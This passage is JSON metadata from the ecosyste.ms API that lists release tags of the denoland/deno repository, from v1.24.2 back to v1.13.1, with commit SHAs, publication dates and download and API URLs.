v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep